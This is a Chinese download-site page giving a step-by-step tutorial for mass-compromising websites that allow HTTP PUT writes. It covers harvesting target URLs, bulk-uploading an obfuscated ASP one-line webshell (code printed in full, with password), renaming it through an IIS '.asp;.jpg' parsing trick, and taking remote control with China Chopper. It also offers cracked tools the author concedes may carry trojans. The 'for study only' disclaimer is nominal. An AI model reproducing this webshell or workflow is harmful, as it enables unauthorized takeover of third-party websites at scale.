最新公告
  • 欢迎您光临源码窝,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 正文概述
  • 评价建议
  • 前分享过一个批量getshell的傻瓜式工具今天发一个稍微深入一点的批量扫描漏洞工具。put漏洞扫描,意思是很多站长在创建网站的时候,由于对网站权限的懵懂,不小心勾选了写入权限,那么就会被软件批量扫描到。然后利用写入权限,写入一个文本文档的一句话木马,再将文档后缀改为图片格式,最后利用菜刀进行远程控制。本文所用到的所有工具都已经打包分享在文章结尾。
    声明:本站提供的软件,不保证没有后门、木马等,只保证我自己不会去做这些事,我自己跑软件都是在虚拟机里跑的,比较这类软件杀软基本都报毒,有能力的自己去提取。
    一、批量采集网址
    想要批量扫漏洞,当然要有海量的网址,网址就相当于养鱼的池子,池子大了捞到的鱼才会多嘛。新乡seo给大家准备了url采集器,根据关键词全自动采集网址。

    西安SEO培训:写入漏洞put批量扫描getshell破解版下

    提示:此软件报毒,自行分辨,建议在虚拟机里运行。
    采集完成以后,保存任意文本文档备用。当然越多越好,也要有自己的思路,小建议:选择同行已经拿到的网站,一般都会在网站描述写他们的网址,尝试用同行的关键识别词去扫,效率大大提高。
    二、批量写入漏洞及改名
    打开批量写入与改名软件,打开软件时会报错,不用理会点击Continue按钮。
    1:首先导入刚才采集到的网址
    2:在右侧内容处写图片一句话代码
    GIf89a <%
     Function MorfiCoder(Code)
     MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
     End Function
     Execute MorfiCoder(")/*/shao/*/(tseuqer lave")
     %>

    西安SEO培训:写入漏洞put批量扫描getshell破解版下

    批量写入漏洞测试
    演示只拿了25个大站测试,当然不可能有可写入的,如果有写入成功的就会在下方的测试返回栏绿色显示出来。如果有扫到绿色的返回结果,右键点击只导出put成功的url
    5:切换到批量改名功能
    首先导入刚才导出的成功的url。然后将文件名改为renyizifu.asp;.jpg 开始按钮执行,同样成功的会在下面绿色显示出来。
    6:改名成功菜刀连接开始折腾吧
    改名成功后就用网址/renyizifu.asp;.jpg 密码为shao 输入到菜刀里就可以控制了。
    菜刀自己一直在用的最后一个版本且无后门,可能这玩意不允许传播,可能会引起不必要的麻烦。如果有兴趣的可以私下找我免费私下分享。
    最后国际惯例的声明:本站分享所有软件仅供学习测试使用,任何行为和责任跟本站无关。
    RIPRO主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
    源码窝 » 西安SEO培训:写入漏洞put批量扫描getshell破解版下

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    源码窝
    提供全网最新资源,如有侵权联系删除

    发表评论

    售后服务:

    • 售后服务范围 1、商业模板使用范围内问题免费咨询
      2、源码安装、模板安装(一般 ¥50-300)服务答疑仅限SVIP用户
      3、单价超过200元的模板免费一次安装,需提供服务器信息。
      付费增值服务 1、提供dedecms模板、WordPress主题、discuz模板优化等服务请详询在线客服
      2、承接 WordPress、DedeCMS、Discuz 等系统建站、仿站、开发、定制等服务
      3、服务器环境配置(一般 ¥50-300)
      4、网站中毒处理(需额外付费,500元/次/质保三个月)
      售后服务时间 周一至周日(法定节假日除外) 9:00-23:00
      免责声明 本站所提供的模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: 80027422@qq.com),我们会及时删除,给您带来的不便,我们深表歉意!

    Hi, 如果你对这款模板有疑问,可以跟我联系哦!

    联系作者
    • 28会员总数(位)
    • 593资源总数(个)
    • 6本周发布(个)
    • 0 今日发布(个)
    • 205稳定运行(天)

    提供最优质的资源集合

    立即查看 了解详情